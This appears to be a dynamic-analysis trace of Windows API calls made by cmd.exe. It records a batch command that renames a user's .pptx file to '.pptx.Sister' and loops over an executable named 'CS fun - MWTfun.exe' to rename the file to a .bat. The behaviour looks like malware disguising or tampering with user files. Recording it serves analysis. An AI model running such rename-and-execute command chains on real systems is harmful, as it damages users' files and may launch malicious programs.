GetProcessHeap () returned 0x21ed8c70000 [0305.764] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x262) returned 0x21ed8c758a0 [0305.764] GetProcessHeap () returned 0x21ed8c70000 [0305.764] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x262 [0305.764] GetProcessHeap () returned 0x21ed8c70000 [0305.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d35fd0 [0305.764] GetProcessHeap () returned 0x21ed8c70000 [0305.764] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d35fd0, Size=0x30) returned 0x21ed8d35fd0 [0305.764] GetProcessHeap () returned 0x21ed8c70000 [0305.764] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d35fd0) returned 0x30 [0305.764] GetProcessHeap () returned 0x21ed8c70000 [0305.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d36010 [0305.764] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.764] GetProcessHeap () returned 0x21ed8c70000 [0305.764] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3c) returned 0x21ed8c7bcb0 [0305.764] ??_V@YAXPEAX@Z () returned 0x1 [0305.764] GetProcessHeap () returned 0x21ed8c70000 [0305.764] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d36010, Size=0x1d0) returned 0x21ed8d36010 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d36010) returned 0x1d0 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d361f0 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d361f0, Size=0x290) returned 0x21ed8d361f0 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d361f0) returned 0x290 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d36490 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d36490, Size=0x30) returned 0x21ed8d36490 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d36490) returned 0x30 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d364d0 [0305.765] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.765] GetProcessHeap () returned 0x21ed8c70000 [0305.765] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3c) returned 0x21ed8c7bb20 [0305.765] ??_V@YAXPEAX@Z () returned 0x1 [0305.765] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.765] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7300 [0305.766] FindClose (in: hFindFile=0x21ed8cc7300 | out: hFindFile=0x21ed8cc7300) returned 1 [0305.766] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7300 [0305.766] FindClose (in: hFindFile=0x21ed8cc7300 | out: hFindFile=0x21ed8cc7300) returned 1 [0305.766] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe0d44205, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe0d44205, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc7300 [0305.766] FindClose (in: hFindFile=0x21ed8cc7300 | out: hFindFile=0x21ed8cc7300) returned 1 [0305.766] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0305.766] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\sNMJVBNQnX-SQV11.pptx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x999c01c0, ftCreationTime.dwHighDateTime=0x1d5d8c6, ftLastAccessTime.dwLowDateTime=0xb6521120, ftLastAccessTime.dwHighDateTime=0x1d5b368, ftLastWriteTime.dwLowDateTime=0xb6521120, ftLastWriteTime.dwHighDateTime=0x1d5b368, nFileSizeHigh=0x0, nFileSizeLow=0x16f95, dwReserved0=0x4, dwReserved1=0x7, cFileName="sNMJVBNQnX-SQV11.pptx", cAlternateFileName="SNMJVB~1.PPT")) returned 0x21ed8cc7300 [0305.767] FindClose (in: hFindFile=0x21ed8cc7300 | out: hFindFile=0x21ed8cc7300) returned 1 [0305.767] _wcsnicmp (_String1="SNMJVB~1.PPT", _String2="sNMJVBNQnX-SQV11.pptx", _MaxCount=0x15) returned 16 [0305.767] malloc (_Size=0x1ff9c) returned 0x21eda2ffc00 [0305.767] ??_V@YAXPEAX@Z () returned 0x21eda2ffc00 [0305.769] GetProcessHeap () returned 0x21ed8c70000 [0305.769] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8690 [0305.769] ??_V@YAXPEAX@Z () returned 0x1 [0305.769] ??_V@YAXPEAX@Z () returned 0x1 [0305.769] GetProcessHeap () returned 0x21ed8c70000 [0305.769] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d364d0, Size=0x1c8) returned 0x21ed8d364d0 [0305.769] GetProcessHeap () returned 0x21ed8c70000 [0305.769] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d364d0) returned 0x1c8 [0305.769] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0305.769] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.769] GetFileType (hFile=0x50) returned 0x2 [0305.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.769] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0305.770] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.770] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0305.775] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.775] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.775] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0305.775] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.775] GetFileType (hFile=0x50) returned 0x2 [0305.775] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.775] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0305.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.776] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0305.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.776] GetFileType (hFile=0x50) returned 0x2 [0305.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.776] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.777] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d35fe0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d35fe0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.777] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"sNMJVBNQnX-SQV11.pptx\" \"sNMJVBNQnX-SQV11.pptx.Sister\" ") returned 56 [0305.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.777] GetFileType (hFile=0x50) returned 0x2 [0305.777] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.777] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.778] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x38, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x38) returned 1 [0305.778] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0305.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.778] GetFileType (hFile=0x50) returned 0x2 [0305.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.778] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.779] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.779] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0305.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.779] GetFileType (hFile=0x50) returned 0x2 [0305.779] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.779] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.780] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0305.780] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0305.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.780] GetFileType (hFile=0x50) returned 0x2 [0305.780] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.780] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.781] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0305.781] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0305.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.781] GetFileType (hFile=0x50) returned 0x2 [0305.781] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.781] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.782] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0305.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.789] GetFileType (hFile=0x50) returned 0x2 [0305.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.789] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.789] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d364a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d364a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.790] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"sNMJVBNQnX-SQV11.pptx.Sister\" \"sNMJVBNQnX-SQV11.bat\" ") returned 55 [0305.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.790] GetFileType (hFile=0x50) returned 0x2 [0305.790] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.790] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.791] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x37, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x37) returned 1 [0305.795] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0305.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.795] GetFileType (hFile=0x50) returned 0x2 [0305.795] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.795] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0305.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.796] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0305.826] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.837] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.837] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.837] malloc (_Size=0xffce) returned 0x21eda2ffc00 [0305.838] ??_V@YAXPEAX@Z () returned 0x21eda2ffc00 [0305.838] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.838] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.838] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.838] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.838] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.838] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.838] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.838] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.838] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.838] ??_V@YAXPEAX@Z () returned 0x1 [0305.838] GetProcessHeap () returned 0x21ed8c70000 [0305.838] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf0) returned 0x21ed8d61f40 [0305.838] GetProcessHeap () returned 0x21ed8c70000 [0305.838] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61f40, Size=0x80) returned 0x21ed8d61f40 [0305.838] GetProcessHeap () returned 0x21ed8c70000 [0305.838] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61f40) returned 0x80 [0305.839] GetProcessHeap () returned 0x21ed8c70000 [0305.839] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x88) returned 0x21ed93790c0 [0305.839] GetProcessHeap () returned 0x21ed8c70000 [0305.839] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf0) returned 0x21ed9377d00 [0305.839] GetProcessHeap () returned 0x21ed8c70000 [0305.839] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377d00, Size=0x80) returned 0x21ed9379930 [0305.839] GetProcessHeap () returned 0x21ed8c70000 [0305.839] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379930) returned 0x80 [0305.839] malloc (_Size=0xffce) returned 0x21eda2ffc00 [0305.839] ??_V@YAXPEAX@Z () returned 0x21eda2ffc00 [0305.839] GetProcessHeap () returned 0x21ed8c70000 [0305.839] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7300 [0305.839] GetProcessHeap () returned 0x21ed8c70000 [0305.839] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373580 [0305.839] _wcsicmp (_String1="sNMJVBNQnX-SQV11.pptx", _String2=".") returned 69 [0305.840] _wcsicmp (_String1="sNMJVBNQnX-SQV11.pptx", _String2="..") returned 69 [0305.840] GetFileAttributesW (lpFileName="sNMJVBNQnX-SQV11.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\snmjvbnqnx-sqv11.pptx")) returned 0x20 [0305.840] GetProcessHeap () returned 0x21ed8c70000 [0305.840] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9416b50 [0305.842] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9416b60 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.842] SetErrorMode (uMode=0x0) returned 0x0 [0305.842] SetErrorMode (uMode=0x1) returned 0x0 [0305.842] GetFullPathNameW (in: lpFileName="sNMJVBNQnX-SQV11.pptx", nBufferLength=0x7fe7, lpBuffer=0x21eda2ffc00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\sNMJVBNQnX-SQV11.pptx", lpFilePart=0xa6cf4fd660*="sNMJVBNQnX-SQV11.pptx") returned 0x2f [0305.842] SetErrorMode (uMode=0x0) returned 0x1 [0305.842] GetProcessHeap () returned 0x21ed8c70000 [0305.842] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372200 [0305.842] _wcsicmp (_String1="sNMJVBNQnX-SQV11.pptx", _String2=".") returned 69 [0305.842] _wcsicmp (_String1="sNMJVBNQnX-SQV11.pptx", _String2="..") returned 69 [0305.842] GetFileAttributesW (lpFileName="sNMJVBNQnX-SQV11.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\snmjvbnqnx-sqv11.pptx")) returned 0x20 [0305.842] ??_V@YAXPEAX@Z () returned 0x1 [0305.842] malloc (_Size=0xffce) returned 0x21eda2ffc00 [0305.842] ??_V@YAXPEAX@Z () returned 0x21eda2ffc00 [0305.843] malloc (_Size=0xffce) returned 0x21eda30fbe0 [0305.843] ??_V@YAXPEAX@Z () returned 0x21eda30fbe0 [0305.843] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\sNMJVBNQnX-SQV11.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\snmjvbnqnx-sqv11.pptx")) returned 0x20 [0305.843] malloc (_Size=0xffce) returned 0x21ed993f900 [0305.843] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.843] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\sNMJVBNQnX-SQV11.pptx", fInfoLevelId=0x1, lpFindFileData=0x21ed9373590, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9373590) returned 0x21ed8d65590 [0305.844] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0305.844] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0305.844] ??_V@YAXPEAX@Z () returned 0x1 [0305.844] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\sNMJVBNQnX-SQV11.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\snmjvbnqnx-sqv11.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\sNMJVBNQnX-SQV11.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\snmjvbnqnx-sqv11.pptx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0305.849] FindNextFileW (in: hFindFile=0x21ed8d65590, lpFindFileData=0x21ed9373590 | out: lpFindFileData=0x21ed9373590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x999c01c0, ftCreationTime.dwHighDateTime=0x1d5d8c6, ftLastAccessTime.dwLowDateTime=0xb6521120, ftLastAccessTime.dwHighDateTime=0x1d5b368, ftLastWriteTime.dwLowDateTime=0xb6521120, ftLastWriteTime.dwHighDateTime=0x1d5b368, nFileSizeHigh=0x0, nFileSizeLow=0x16f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="sNMJVBNQnX-SQV11.pptx", cAlternateFileName="")) returned 0 [0305.850] GetLastError () returned 0x12 [0305.851] FindClose (in: hFindFile=0x21ed8d65590 | out: hFindFile=0x21ed8d65590) returned 1 [0305.851] ??_V@YAXPEAX@Z () returned 0x1 [0305.851] ??_V@YAXPEAX@Z () returned 0x1 [0305.851] ??_V@YAXPEAX@Z () returned 0x1 [0305.851] ??_V@YAXPEAX@Z () returned 0x1 [0305.851] GetProcessHeap () returned 0x21ed8c70000 [0305.851] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65d70 [0305.851] GetProcessHeap () returned 0x21ed8c70000 [0305.851] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95940, Size=0x16) returned 0x21ed8c95a60 [0305.851] GetProcessHeap () returned 0x21ed8c70000 [0305.851] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95a60) returned 0x16 [0305.851] GetProcessHeap () returned 0x21ed8c70000 [0305.851] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b30, Size=0x20) returned 0x21ed8d45e90 [0305.851] GetProcessHeap () returned 0x21ed8c70000 [0305.851] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45e90) returned 0x20 [0305.852] GetProcessHeap () returned 0x21ed8c70000 [0305.852] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61920 [0305.852] GetProcessHeap () returned 0x21ed8c70000 [0305.852] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61920, Size=0xb2) returned 0x21ed9375ff0 [0305.852] GetProcessHeap () returned 0x21ed8c70000 [0305.852] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9375ff0) returned 0xb2 [0305.852] GetProcessHeap () returned 0x21ed8c70000 [0305.852] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d366b0 [0305.852] GetProcessHeap () returned 0x21ed8c70000 [0305.852] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d366b0, Size=0x30) returned 0x21ed8d366b0 [0305.852] GetProcessHeap () returned 0x21ed8c70000 [0305.852] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d366b0) returned 0x30 [0305.852] GetProcessHeap () returned 0x21ed8c70000 [0305.852] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d366f0 [0305.853] malloc (_Size=0x1ff9c) returned 0x21eda2ffc00 [0305.853] GetProcessHeap () returned 0x21ed8c70000 [0305.853] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9375e70 [0305.853] GetProcessHeap () returned 0x21ed8c70000 [0305.853] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed9374c70 [0305.854] ??_V@YAXPEAX@Z () returned 0x1 [0305.854] malloc (_Size=0x1ff9c) returned 0x21eda2ffc00 [0305.854] GetProcessHeap () returned 0x21ed8c70000 [0305.854] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed9376230 [0305.854] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda2ffc00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0305.854] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, 